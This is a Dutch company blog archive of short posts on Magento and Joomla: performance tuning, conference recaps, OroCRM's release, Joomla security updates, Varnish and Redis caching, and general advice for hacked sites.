    kissmatrics-loading-time-s

    Magento Mobile template

    Zoals je kon lezen in het vorige blog 'Magento Performance Optimization: How To' vertelden we over een geoptimaliseerd Magento Mobile template door ons voorzien van alle optimalisatie settings. Ben je hier benieuwd naar of wil je hier meer over weten. Dan horen we dat graag op de MUG en anders via dit contactformulier.

    meer info   of   

    Bel nu! 020 337 5961

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

  • Nieuwe Magento User Group events bekend

    meetuplogoEr zijn een tweetal positieve veranderingen omtrent het Magento Competence Center. We organiseren en communiceren vanaf heden via Meetup en we zitten op een nieuwe locatie. Wil je op de hoogte blijven van de komende events? Word dan lid van onze Meetup Group - Magento User Group Amsterdam.

    Op de hoogte blijven via Meetup

    Magento User GroupWe organiseren de komende Magento events vanaf heden nog enkel via Meetup. Wil je op de hoogte blijven van de agenda van het Competence Center? En wil je je kunnen inschrijven voor de komende events? Maak dan een profiel aan bij Meetup. Dit kan door rechts bovenaan op de registratieknop te drukken. Je hoeft alleen een gebruikersnaam, e-mail en wachtwoord in te vullen. Nadat je een profiel hebt aangemaakt, kun je lid worden van onze Meetup Group - Magento User Group Amsterdam.

    Agenda Magento User Group

    De komende maanden hebben we weer een aantal leuke Magento User Groups. Blijf op de hoogte via Meetup.

    We hopen je graag tijdens deze bijeenkomsten te verwelkomen! Nog suggesties voor MUG of workshop onderwerpen? Graag een presentatie geven? We horen het graag via info[at]magento-competence-center.com.

    Nieuwe locatie

    Tegenwoordig houden we onze Magento User Groups in ons nieuwe kantoorpand. Het adres van deze locatie is: De Ruijterkade 139, 1011 AC Amsterdam.

    meer info   of   

    Bel nu! 020 337 5961

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

  • Magento Performance Optimization: How To

    magento performance optimazation how toOnlangs is er een nieuw Packtpub uitgekomen genaamd: Magento Performance Optimization: How To.
    Het boek geeft een kort overzicht wat er allemaal komt kijken bij het optimaliseren van een Magento website. Zoals wellicht bekend is het hosten van een Magento omgeving niet bepaald gemakkelijk en is een goede hosting en applicatie configuratie van Magento van essentieel belang om een snelle website voor je klanten te creëren.

    Magento Performance tips

    Het Magento Performance optimalisatie boek besteed uitgebreid aandacht aan de volgende zaken welke een belangrijk onderdeel zijn voor een kwalitatieve snelle website.

    • Mergen van CSS (samenvoegen van CSS bestanden)
    • Mergen van JS (samenvoegen van Javascript bestanden)
    • Logging bestanden
    • Compileren van Magento php code
    • Toepassen van de Magento indexen
    • Verwijderen van het Magento Paypal logo
    • Magento caching configuratie
    • Laten verlopen van statische bestanden middels "expire headers"
    • Keep Alive voor Magento
    • Session storage in de database
    • MySQL optimalisatie voor Magento
    • Memory based file caching for Magento
    • Code compressie met GZIP
    • PHP versnellers
    • Clustering
    • Loadbalancing
    • Database replica
    • System configuratie optimalisatie
    • Cache opschonen
    • Magento logging
    • Magento template/theming tips
    • Magento profiler
    • Magento debugger

    Vele van bovenstaande toepassingen zijn nog steeds actueel. Maar met de komst van nieuwe technieken ontwikkelen deze zich continue.

    Magento Redis

    Voor actuele Magento optimalisaties i.c.m. met Magento Redis voor Fullpagecaching en Redis session storage kunnen wij je zeker helpen.

    Onlangs hebben wij een nieuwe VPS image gereleased "Jira Magento image V6" welke standaard alle bovenstaande punten heeft, en nog veel meer!
    Bekijk onze demo website op deze pagina: http://www.magento-speed.com

    Magento Mobile Performance Optimalisatie

    Met de komst van nieuwe ontwikkelingen en de verdere toename van Magento mobile hebben wij nu ook een geoptimaliseerd Magento Mobile template gemaakt welke gebaseerd is op de Magento Mobile 1.7 template maar dan voorzien van alle optimalisatie settings. Tevens is er een nieuwe oplossing gecreeërd welke het mogelijk maakt Magento Mobile direct voor meerdere mobiele toestellen te ondersteunen i.p.v. enkel de iphone optie.
    Eventuele extra finetuning in het theme is dan nog wel wenselijk maar hij detecteert nu wel standaard een groot gedeelte van de meest actuele mobile devices.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Meet Magento 2013 Recap

    mm13headerrecap

    Voor de 5de keer op rij vond Meet Magento NL plaats. Met deze lustrum editie werd ook direct een nieuw record gevestigd qua bezoekers, namelijk tegen de 400 aanmeldingen.

    Het programma was dit jaar weer goed gevuld met diverse interessante basis sessies en workshops. Helaas waren er maar een beperkt aantal beschikbare plaatsen voor de workshops en zaten deze snel vol. Het sprekersveld werd gevuld door zowel nationale als internationale sprekers. Magento's eigen CEO Roy Rubin deelde tijdens de openingsspeech de actuele status van Magento en toekomstvisie. Een van de interessante feiten is dan ook wel dat Magento in de afgelopen 5 jaar uitgegroeid is tot het grootste open source e-commerce platform wereldwijd.

    OroCRM

    OroCRM en Oro-Platform was wellicht een vreemde eend in de bijt van deze editie van Meet Magento. OroCRM is namelijk een nieuw plaform gemaakt door voormalig CTO Yoav Kutner en andere Magento prominenten zoals Dima Soroka en Jary Carter. OroCRM is namelijk een CRM oplossing voor e-commerce applicatie zoals Magento waardoor het straks eenvoudig is om klantbeheer effectief op te pakken aangezien dit mist in Magento.

    Meer info over OroCRM op onze website vind je hier.

    Magento Enterprise 1.13.0.1

    Magento Enterprise 1.13.0.1 is een belangrijke patch welke onlangs beschikbaar is gesteld. De versie lost een belangrijk Magento security bug op, en problemen met de duplicated URLS voor producten en categorieën. Voor meer informatie ga naar deze pagina.

    Google Shopping stopt 11 juni met gratis versie

    Google shopping is afgelopen jaren uitgegroeid tot een groot succes, mede door het gratis gebruik. Google stopt hiermee per 11 juni a.s. Dit houdt in dat vanaf die datum er voor het gebruik per click (zoals bij Adwords) betaald zal moeten worden voor het gebruik van Google shopping voor Magento. Met deze keuze probeert Google de kwaliteit van de shop naar een hoger niveau te tillen. Aanpassingen in de Magento module voor Google shopping zijn niet nodig enkel de budget aanpassingen in het Google account.

    SupportDesk als sponsor en als spreker aanwezig op Meet Magento 2013

    De borrel op woensdagavond 29 mei was uiterst gezellig en daarmee werd Meet Magento 2013 op een leuke, informele manier ingeluid.

    Een goed begin van het evenement, dat vooral naar meer smaakt. Op donderdag 30 mei stond er een groep SupportDeskers paraat op Meet Magento, hét Nederlandse evenement voor Magento professionals. Gretig werd er gekletst en informatie gedeeld over hetgeen waar iedereen zich mee bezig houdt, namelijk Magento.

    SupportDesk op Meet Magento 2013

    De stand van SupportDesk stond er en Ray Bogman gaf tussen de bedrijven door een presentatie en hij liep rond als Magento doctor. De presentatie ging over deze case study: Magento Cluster - Condoom Anoniem - Zon Zee Zuipen.

    SupportDesk op Meet Magento 2013

    Onze complimenten gaan uit naar degene verantwoordelijk voor het organiseren hiervan, dankjewel Dutchento. Het was een groot succes!

    meer info   of   

    Bel nu! 020 337 5961

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

  • Win 5 APK’s tijdens MM13NL
    31 mei 2013: De winnaars van de APK zijn per e-mail op de hoogte gebracht. Gefeliciteerd!! Eén winnaar was zo netjes om te zeggen dat hij eigenlijk momenteel geen Magento webshop had.. dus Rolf: je bent daarom van harte welkom op de vrijdag middag borrel. We horen graag wanneer je in de buurt bent. Tot snel!

    Ben je donderdag 30 mei op Meet Magento 2013? Kom naar de SupportDesk stand (standnummer 1) en geef ons je visitekaartje en maak kans op 1 van die 5 APK's.

    supportdesk meetmagento2013

    Win Magento APK op Meet Magento

     

    Deze Magento APK is voor elke Magento webshop een aanvulling op de kwaliteit van de website.
    Bij de APK worden de volgende onderdelen gecontroleerd:

    • Security Audit
    • Hosting Check
    • Mobile First
    • Transactionele Email
    • Website Performance Check
    • Search Engine Optimization
    • Advies Backup en 'Failover'

    Ben je benieuwd naar hoe zo'n Magento APK rapport eruit ziet?

    Klik op het plaatje hieronder.

    SupportDesk is verhuisd

     

    meer info   of   

    Bel nu! 020 337 5961

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

     

     

     

  • OroCRM en Oro Platform live!

    OroCRMOroCRM en Oro Platform zijn vandaag vrijgegeven om te testen

    Met de komst van OroCRM beginnen we een nieuw tijdperk in de wereld van E-commerce en CRM. OroCRM is nl het eerste CRM platform speciaal gemaakt voor e-commerce toepassingen zoals bijv. Magento, Joomla!, Drupal, etc...

    Onderstaande tekst is een vrije vertaling van het persbericht gepubliceerd door Yoav Kutner (CTO OroCRM).

    Het is een spannend moment voor OroCRM! Vandaag maken we onze code beschikbaar en is open voor iedereen. We hopen dat dit ons in staat stelt om meer samen te werken met onze groeiende gemeenschap. Om wat context te geven, in deze post zullen we onze product kenmerken tonen en de keuze van ons licentiemodel.

    OroCRM productkenmerken

    Veel tijd is er sinds het begin van het OroCRM project besteed aan het creëren van het Oro Platform en ons Business Application Platform (BAP). Via het Oro Platform willen wij de verbinding met onze ontwikkelaars binnen de gemeenschap zoeken en op een meer zinvolle manier dan de traditionele software-applicaties ontwikkelen. Het Oro Platform creëert ook de basis voor het bouwen van een echt flexibel en schaalbaar OroCRM product. Enkele van de belangrijkste kenmerken van de Oro Platform zijn:

    • Geavanceerd zoeken
    • REST en SOAP API's
    • Volledige navigatie met flexibele menu-structuur - waaronder geschiedenis, de meest bekeken bestanden en een Pinbar
    • Gebruikers-, groepen- en rollen-management met ACL
    • Flexibele entiteiten met dynamic attributen
    • Gegevensaudit
    • Data Grid
    • Formulieren automatisch opslaan

    Deze productkenmerken en toekomstige functionailiteit die momenteel nog gebouwd worden, zijn de basis van het Oro Platform en zijn het begin van onze visie in het verminderen van de ontwikkeltijd in business applicatie-ontwikkeling.

    Naast de volledige functieset van het Oro Platform, zullen deze ook onderdeel zijn van OroCRM en als basis dienen voor de OroCRM flexibiliteit van het product. Tevens zijn er ook extra functies toegevoegd aan OroCRM. De belangrijkste functies zijn onder meer accounts, contacten en Group Management. Aan deze functies wordt momenteel nog steeds gewerkt binnnen zowel OroCRM en Oro Platform en zijn NIET voor de productie bedoelt maar enkel voor evaluatie-doeleinden.

    Komende maanden zal er hard gewerkt worden om onze visie CRM voor E-commerce verder te ontwikkelen. In de tussentijd hopen we veel feedback te ontvangen van mensen die OroCRM testen. De Forums zijn NU open dus meldt je aan en registreer je nu.

    OroCRM licentie model

    Het was ons doel om zo "ecosysteem friendly" als mogelijk te zijn, in het kiezen van onze open source-licentie.
    Voor de Oro Platform kozen we de MIT-licentie. We kozen voor deze bijzondere licentie omdat het volledig open is aan degenen die het platform willen gebruiken om hun eigen commerciële toepassingen te creëren. We hopen dat veel open source en commerciële toepassingen zullen worden gebouwd op het Oro Platform. In feite hebben we al een product dat wordt gebouwd op het Oro Platform, Akeneo, een Open Source Product Information Management (PIM) systeem. ( www.akeneo.com ) Ze gebruiken het platform om een snelle ontwikkeling van hun product af te kunnen leveren en wilden een zo flexibele mogelijke licentie model voor de commerciële toepassingen.

    Voor OroCRM kozen we voor OSL 3.0 . We kozen voor het OSL 3.0 omdat het de flexibiliteit is voor onze klanten en eenvoudig commerciële verder te verspreiden.

    OroCRM en Oro Platform downloaden

    OroCRM en Oro Platform zijn te downloaden via Git.

    Oro CRM documentatie

    Onze documentatie is beschikbaar op onze wiki. Momenteel wordt er nog hard werkt hieraan en zijn aanvullingen vanuit de gemeenschap van harte welkom.

    Het Oro Team

    bron: http://www.orocrm.com/blog/news/orocrm-and-oro-platform-code-is-public

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

     

  • Magento of Joomla! gehacked? 10 stappen ter verbetering

    Magento of Joomla! gehacked?Is je Magento of Joomla! website gehacked?

    Met enige regelmaat ontvangen wij support vragen mbt gehackte Magento en Joomla! website.
    Deze zijn vaak te verhelpen vooraf. Daarom hebben wij een overzicht gemaakt welke maatregelingen je kunt nemen en je Magento en/of Joomla! website kunt verbeteren.

    Tien concrete maatregelen om je informatiebeveiliging direct naar een hoger plan te tillen.

    1. Begin met het maken van een risicoanalyse. De kernvraag daarbij is: Wat zijn de essentiële waarden voor onze organisatie en wat is de impact als die bedreigd worden (op imago, klantrelaties, ontinuïteit, business)?
    2. Stel aan de hand van deze risicoanalyse een beveiligingsbeleid vast en een reeks concrete maatregelen (en investeringen) als uitvloeisel daarvan.
    3. Check deze maatregelen aan de hand van de 132 maatregelen in de ISO 27002 Code voor Informatiebeveiliging.
    4. Toets of je nog zaken mist naar aanleiding van de uitkomsten van de stappen 1 en 2 en stel je beleid aan de hand daarvan bij. Zijn er risico's die je nog niet had geïdentificeerd of noodzakelijke maatregelen die in eerste instantie aan je aandacht waren ontsnapt?
    5. Als er een gevaar bestaat van DDoS-aanvallen zorg er dan voor dat je servercapaciteit overgedimensioneerd is. Of zorg ervoor dat je in dat geval zeer snel capaciteit kunt opschalen (bijvoorbeeld via cloudservices).
    6. Filter je netwerk op malwarepatronen, of laat je internet serviceprovider dat voor je doen. Ook dit is een goede bescherming tegen DDoS-aanvallen.
    7. Zorg voor goede it-technici. Hoe meer IT deel uitmaakt van je corebusiness, hoe belangrijker het is dat je over goed gekwalificeerd eigen personeel beschikt.
    8. Stel nu al vast wat je straks gaat doen als het misgaat. Stel scenario's op en maak een bedrijfscontinuïteitsplan.
    9. In geval van een ernstig incident:
      1. Ga niet meteen handelen, maar verzamel eerst de feiten
      2. Stel op grond daarvan een eerste diagnose. Ga daarna over tot handelen
      3. Analyseer vooral de impact op je business
      4. Informeer de belanghebbenden
      5. Doe geen toezeggingen waarvan je niet zeker weet dat je ze waar kunt maken
    10. Als je het vermoeden hebt dat je Magento of Joomla! website gehackt is, maar daar technisch de vinger niet achter krijgt, overweeg dan een forensische it-specialist in te schakelen.

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • SupportDesk op Meet Magento 2013

    mm13header
    Dit jaar strijkt Meet Magento voor de vierde keer neer in het Gelderse Ede en wel in Hotel/Theater De Reehorst, een prachtige locatie in het midden van het land, op woensdag 29 mei en donderdag 30 mei.

    Tal van nationale en internationale sprekers leveren een bijdrage met praktijkvoorbeelden, technische sessies, workshops en ronde tafel sessies. Ook SupportDesk zal op dit evenement aanwezig zijn, als sponsor en spreker.

    Lees hier meer over de locatie en het programma.

    Oprichters Magento komen naar Nederland!

    Tijdens de allereerste Meet Magento in Europa op 27 januari 2009 waren zij er beiden bij. Toen was de software net gereleased maar de aandacht voor het systeem was al enorm door de unieke combinatie van open source en het scala aan features dat vergelijkbaar was met de grote commerciële systemen in die tijd.

    Eind deze maand op 30 mei, tijdens de 5e editie van Meet Magento staan beide oprichters van Magento weer op het podium: Roy Rubin en Yoav Kutner.

    royrubenTijdens de conferentie zal Roy Rubin, nu VP en COO bij eBay op 30 mei de opening keynote verzorgen. Roy houdt zich bezig met de algemene strategie van Magento als bedrijf met focus op het helpen van klanten en partners door het Magento platform. Hij overziet ook Magento’s trainingen, marketing, sales en support. Roy zal tijdens zijn keynote een overzicht geven van alle ontwikkelingen binnen Magento Inc. en eBay. Hij kijkt terug op het afgelopen jaar en kijkt vooruit naar de ontwikkelingen die we de komende tijd kunnen verwachten.

    yoavkutnerOok Yoav Kutner behoeft in de Magento community eigenlijk geen introductie meer. Yoav is met Roy mede oprichter van Magento en als voormalig CTO de grondlegger van de Magento software. Samen met Jary Cartner (voormalig Vice President bij Magento) is hij vorig jaar vertrokken bij Magento om zich te richten op een nieuw bedrijf (Magecore) en een nieuw product (OroCRM). Als eerste ter wereld zullen de bezoekers tijdens Meet Magento 2013 kennis kunnen maken met het systeem via een demo van het systeem door Yoav en Jary.

    Meet en Greet Supportdesk 29 mei

    mm13borrelOp woensdag 29 mei zal Guido Jansen een introductiesessie verzorgen. Deze 3 uur durende sessie is bedoeld voor mensen die willen starten met Magento of net zijn begonnen. Lees hier meer over deze introductiesessie.

    Die avond, vanaf 19 uur zal er een Pre-Party zijn. Dit is een netwerkborrel voorafgaand aan de congresdag op 30 mei. Bestel hier de Meet Magento entree kaarten.

    Ben je erbij? Stuur even een bericht via ons contactformulier om te laten weten dat je langskomt!

    SupportDesk als Sponsor en Spreker op 30 mei

    mm13apkGraag zien we je (uiteraard helemaal fris na de borrel van de vorige avond) op onze stand langskomen. Je kan zelfs een Magento APK winnen. Het enige wat je daarvoor hoeft te doen is je visitekaartje bij ons achter te laten. Hiermee maak je kans op een Magento APK t.w.v. 250 euro en je wordt in de toekomst op de hoogte gehouden van alle nieuwtjes rondom Magento en Joomla! Er worden op het einde van de dag 5 Magento APK's verloot. 

    Spreker Richard & Ray: de impact van Radio/TV commercials op je webshop

    mm13rrRay heeft de afgelopen 5 jaar elk jaar als spreker op Meet Magento gestaan en Richard heeft in 2011 gesproken over de combinatie tussen Magento, Joomla (MageBridge) en Mobile. Inmiddels hebben ze een hoop interessante dingen meegemaakt en willen deze ervaringen graag met je delen.

    De case gaat over de impact van Radio/TV commercials op je webshop

    Lees meer over de case die Richard & Ray gaan bespreken op deze pagina. Tijdens deze sessie zullen ze vertellen over de valkuilen, de learnings, de benodigde infrastructuur en wat het nu allemaal uiteindelijk heeft opgeleverd voor de business.

    Win Meet Magento entree kaarten!!winmm13entreekaarten

    And last but not least...We hebben een aantal kaartjes (t.w.v. 140 euro per stuk) weg te geven en jij kan deze winnen! Like onze SupportDesk Facebook pagina of Follow onze SupportDesk Twitter pagina. Let op: Deze entree kaartjes zijn bestemd voor webwinkeliers.  

    Wie zich vanaf vandaag tot en met 15 mei inschrijft maakt kans op deze kaarten. 

     

    meer info   of   

    Bel nu! 020 337 5961

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

  • SupportDesk migratie naar Zendesk icm Freshbooks

    Extra toelichting gebruik van Zendesk en Freshbooks.

    We zijn ontzettend blij dat het moment is aangebroken dat we ons nieuw systeem mogen introduceren! Dit systeem zal ons maar ook jou als klant van de nodige gemakken voorzien.

    Waarom een nieuw systeem?

    SupportDesk heeft het oude ticketingsysteem vervangen door het nieuwe systeem genaamd Zendesk, in combinatie met Freshbooks. Het vervangen van het huidige systeem was noodzakelijk vanwege de groei die het bedrijf in een jaar tijd heeft gemaakt. Het voorgaande klantenservicesoftware bood hierdoor niet meer genoeg functionaliteiten. Kwaliteit op het gebied van o.a. ideeën, processen en diensten staan bij SupportDesk hoog in het vaandel. De keuze naar een verder ontwikkeld systeem zal ten goede komen van de klanttevredenheid. En dat vinden we heel belangrijk!

    Waar kun je als klant terecht?

    Zoals je in het plaatje kunt zien kun je gemakkelijk naar de verschillende systemen gaan via bestaande link: http://www.supportdesk.nu/support/

    nieuwesystemen

    • Vision: dit is het voorgaande systeem. Hier kun je als bestaande SupportDesk klant terecht voor alle legacy. Wil je nog iets nalezen over een voorgaande dienst dan kun je hier naar toe.
    • Zendesk: ons nieuw ticket systeem wat we met trots vanaf 1 mei gaan inzetten. Zendesk is een bewezen applicatie op de Nederlandse ticketsysteem markt.
    • Freshbooks: wil je het opgebouwde tegoed controleren dan kun je terecht bij ons facturatie systeem. Hier heb je inzicht op de uitgaven, hoeveelheid tegoed, facturaties, e.d.

    Verandert de werkwijze?

    Praktisch gezien verandert er weinig voor de klant. Het enige wat positief zal veranderen is het inzicht op de tickets communicatie en het huidige tegoed en afboekingen.

    Middel ons bekende mail adres: support [at] supportdesk.nu kunnen supportvragen worden gesteld.

    Chat optie:

    Middels de chat optie in de "feedback" tab aan de rechterkant van het support scherm kun je eenvoudig met een van onze support medewerkers in contact komen.
    Tip: gebruik Firefox of Internet Explorer, momenteel werkt Chrome nog niet helemaal correct.

    Omdat we werken met prepaid pakketten is het belangrijk dat je hier goed inzicht op hebt. Wil je meer weten over onze manier van werken? Dit kun je terugvinden op onze site, onder de diverse tabbladen bij pakketten en prijzen.

    meer info   of   

    Bel nu! 020 337 5961

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

  • Joomla Security Update versie 3.1

    security release

    Het Joomla project heeft vandaag een nieuwe Joomla release vrijgegeven, versie 3.1. Het betreft hier een Joomla Stable release.
    Naast de 7 Joomla Security (low Priority) is er ook een lose patch beschikbaar voor Joomla 3.0.4.

    Wat is er allemaal nieuw in Joomla 3.1?

    Een van de nieuwe features is het "Joomla Tagging" systeem waarmee het nu zeer eenvoudig is een artikel onderdeel te maken van verschillende categorieën door middel van een "tag" toe te voegen aan een artikel welke dan middels een menu item gekoppeld kan worden.

    Overige nieuwe features in Joomla 3.1 zijn o.a.: 

    • OpenStreetMap
    • Media Wiki
    • Log files bekijken in debug modes

    Highlight in de Joomla 3.x reeks

    • Bootstrap template (responsive design)
    • PostgreSQL
    • Memcache
    • Opslaan van een leeg artikel
    • etc....

    Meer weten welke issues gefixed zijn, kijk dan op de Joomla 3.1 website

    joomla-31

    meer info   of   

    Bel nu! 020 337 5961

     

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Joomla Security Update versie 2.5.10

    security release

    Het Joomla project heeft vandaag een nieuwe Joomla release vrijgegeven, versie 2.5.10. Het betreft hier een Joomla Security release.
    Naast de 7 Joomla Security aanpassingen zijn tevens 38 bug gefixed.

    Meer weten welken issues gefixed zijn, kijk dan op de Joomla 2.5.10 website

    Update (25/04) : let op bij het patchen. momenteel blijkt er een bug in Joomla 2.5.10 te zitten, zie hier de bug tracker. Mogelijk dat op termijn Joomla nog een nieuwe release nl. Joomla 2.5.11 zal uitgegeven om deze bug te verhelpen.

     

    meer info   of   

    Bel nu! 020 337 5961

     

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento 1.8 CE binnenkort beschikbaar

    De Magento 1.8 release was één van de hoogtepunten welke tijdens het Magento Imagine eCommerce congres te Las Vegas gisteren bekend is gemaakt. Magento 1.8 zal binnen twee weken beschikbaar zijn.

    Met de komst van Magento 1.8 is het bijna een jaar geleden dat Magento 1.7 beschikbaar kwam.

    Magento 1.13 Enterprise

    Naast de nieuwe Magento 1.8 Community Edition Release zal vanaf a.s. woensdag ook een nieuwe Magento Enterprise editie verschijnen, nl. Magento Enterprise 1.13.

    Een opsommig van de nieuwe functionalieiten zal snel volgen.

    • meer dan 100 bugs opgelost

     

    Redis standaard in Magento Enterprise 1.13

    Een van de belangrijkste vernieuwingen binnen Magento Enterprise 1.13 is toch wel Redis
    Redis is een key-value storage caching toepassing welke de huidige Magento caching toepassing dan ook volledig kan vervangen.
    Binnen de Magento Redis toepassing is het mogelijk alle caching data zoals: 'block', 'config' en 'sessions' in een Redis database op te slaan.

    Redis voor Magento Community Editie

    Binnen SupportDesk gebruiken wij deze Redis toepassing al enige tijd in de Magento Community Editie. En het wordt bij vele klanten als positief ervaren. De snelheidswinst is gemiddeld boven de 50%.

    Zie hier een voorbeeld van een Redis Magento website van een van onze klanten: [http://www.wildhibiscus.nl/]

    Officieel is nog niet bekend wanneer Magento de Community Editie zal ondersteunen met Redis, dus maken wij voorlopig nog gebruik van een custom configuratie.

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento Caching (Varnish, Redis) & Imagine recap

    Magento User Group

    De eerstvolgende Magento User Group zal gaan over Magento Caching en er gaat gesproken worden over het evenement Imagine.

    Wat is Caching?

    Cache (spreek uit als: kesj van het Franse werkwoord cacher = verbergen) is een opslagplaats van veel gebruikte data of een kopie van de data. Caching maakt je site niet alleen een stuk sneller, het scheelt ook load op de server, met name voor druk bezochte sites.

    Ok, dat weten we inmiddels wel, maar wat is de beste oplossing bij Magento?

    Een voor de hand liggende vraag zonder een eenduidig antwoord. Het ligt er o.a. aan hoe de shop gehost wordt (dedicated of shared hosting), wat voor omgeving heb je, wat is je budget. Eén ding is zeker en dat is dat caching ingezet kan worden voor een betere performance van je Magento shop, en een betere performance kan bijdragen aan hogere conversie.

    Magento Caching (Varnish, Redis)

    varnishVarnish is een externe caching server, waarmee je webshop tot 20x kan worden versneld. Het is een slimme reverse proxy server. In principe staat Varnish als de ontvangende webserver ingesteld, dat betekent dat elke bezoeker voor een site in een Varnish configuratie in eerste instantie bij de Varnish server terecht komt. Varnish heeft slimme mechanismes waarmee hij niet alleen controleert of hij de pagina al eerder opgeslagen heeft, maar ook checked of er misschien informatie op de pagina staat die persoonlijk voor de gebruiker zijn. Zo voorkomt Varnish dat hij (bijvoorbeeld) een winkelwagen van een bezoeker cached en deze vervolgens aan alle bezoekers van die pagina toont.

    redisRedis is een geavanceerder caching system dan memcache. Ook dit kan ingezet worden voor flinke performance tweak. Deze is belangrijk aan het worden binnen de magento wereld. Redis is een open source in-memory, key-value data store. Redis is snel omdat de gehele dataset in het RAM geheugen staat. Een ander kenmerk is dat het data model weinig beperkingen kent en zijn er complexe datatypen mogelijk.

    Wil je meer weten over de mogelijkheden van Magento Caching kom dan zeker naar deze MUG en discussiëer mee. Krijg tips en tricks van andere aanwezigen.

    Magento Imagine event

    Magento Imagine event

    Daarnaast zullen de zaken die naar buiten zijn gebracht tijdens het Magento Imagine event (Worldwide Magento Conference, Las Vegas) besproken worden.

    Magento User Group Informatie

    Waar kan ik me inschrijven?

    Ga naar deze Magento Competence Center pagina en schrijf je in voor de volgende mug. Kom naar deze Magento User Group en discussiëer mee. Krijg tips en tricks van andere aanwezigen.

    Wij zien je met veel plezier in de Magento Competence Center te Amsterdam.

    Ben je nog niet zeker of de Magento User Group iets voor jou is en wil je hier meer over weten lees dan dit blog. Daar lees je over voor wie de MUG is bedoeld en welke onderwerpen er onder meer aan bod komen.

    meer info   of   

    Bel nu! 020 337 5961

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

  • Magento 2.0 - Magento 1.8 - Snowcamp - OroCrm

    Magento DoktorOnlangs werd er in Kaprun (Oostenrijk) voor de 2de keer op rij een Magento Developers Paradise snowcamp georganiseerd. Tijdens deze editie waren vele Magento developers uit diverse werelddelen weer bij elkaar gekomen om de actuele kennis met elkaar te delen. Zo waren er developers uit zowel Nieuw Zeeland, Brazilië, Denemarken, Oekraïne, Hongarije, Amerika, Nederland en België vertegenwoordigd.

    Deze snowcamp editie staat vooral in het teken van netwerken, presentaties en niet te vergeten fun hebben op de skipistes. Zo begon het programma vroeg in de ochtend al op de piste en werden er einde dag diverse presentaties verzorgd door o.a. Magento Inc., X.commerce, PayPal, SupportDesk, Integer_net, Atwix, Sitewards en hoofdsponser Eltrino.

    OroCRM - open source e-commerce CRM framework

    Tijdens het event was voormalig CTO Yoav Kutner en voormalig Lead Architect Dima Soroka van Magento Inc. aanwezig. Beide zijn medio 2012 bij Magento vertrokken maar zijn nog zeer actief betrokken bij de Magento ontwikkelingen. Via het bedrijf MageCore inc. worden diverse modules beschikbaar gesteld zoals o.a. een advanced Dashboard voor diverse management rapportage. Maar de main focus voor beide heren is momenteel Orocrm Inc. (orocrm.com). Orocrm is een vernieuwd CRM platform gebaseerd op Sympony2 (PHP framework) welke middels een community, enterprise en hosted oplossing beschikbaar zal zijn eind 2013. Medio 2013 zal eerst een alpha versie beschikbaar worden gesteld voor de developers. Middels deze weg kunnen ontwikkelaars kennis maken met de kracht van het nieuwe open source CRM systeem welke veel lijkt op de begin visie van Magento destijds: Open, Uitbreidbaar, Schaalbaar en Flexibel. Orocrm zal bijv. standaard gekoppeld kunnen worden met Magento en zijn koppeling met bijv. Google Docs of Google Apps binnen handbereik.

    Vele ontwikkelingen op Magento vlak waren er ook, zo bleef helaas de langverwachte Magento 2.0 Alpha nog uit, maar werd er wel in gegaan op de nieuwe template architectuur van Magento 2.0 en werkt er input gevraagd vanuit X.Commerce (de Magento, Ebay en Paypal company) hoe Magento 2.0 nog beter toegankelijk gemaakt kan worden voor developers.

    Skilift geruchten

    De gemoederen rond magento 2.0 waren ook in de skiliften te merken, zo werd er volop gespeculeerd over de langverwachte reeds vele malen uitgestelde Magento 2.0 versie. In eerste instantie zou deze namelijk eind Q4 2011 uitkomen, toen werd het Q1 2012 en nu is de laatste versie wel beschikbaar in Github maar wordt er gezwegen over een uiteindelijke datum. De vermoedens zijn nu ergens in 2014.

    Magento 1.8

    Met het uitstel van Magento 2.0 rijst de vraag weer op: hoe zit het dan met Magento 1.x. aangezien de laatste versie nu ook alweer dateert van Q1 2012. Magento 1.7 is reeds wel al voorzien van 2 extra patch versies welke enkel diverse Paypal bugs oploste is er nu geruim 1 jaar geen nieuwe release meer geweest. Zal Magento dan tijdens het jaarlijkse Imagine congres in Las Vegas Magento 1.8 vrijgeven is dan ook de vraag. Magento 1.8 zal hoogstwaarschijnlijk enkel vele bugs oplossen en is het nog onduidelijk of hier dan ook nieuwe functionaliteiten in zitten. Tevens werd vernomen dat Magento en Ebay de focus van X.Commerce (x.com) en dus ook de ondersteuning en verdere bouw van Fabric gestopt hebben om zo de focus op Magento te hebben.

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • SupportDesk is verhuisd

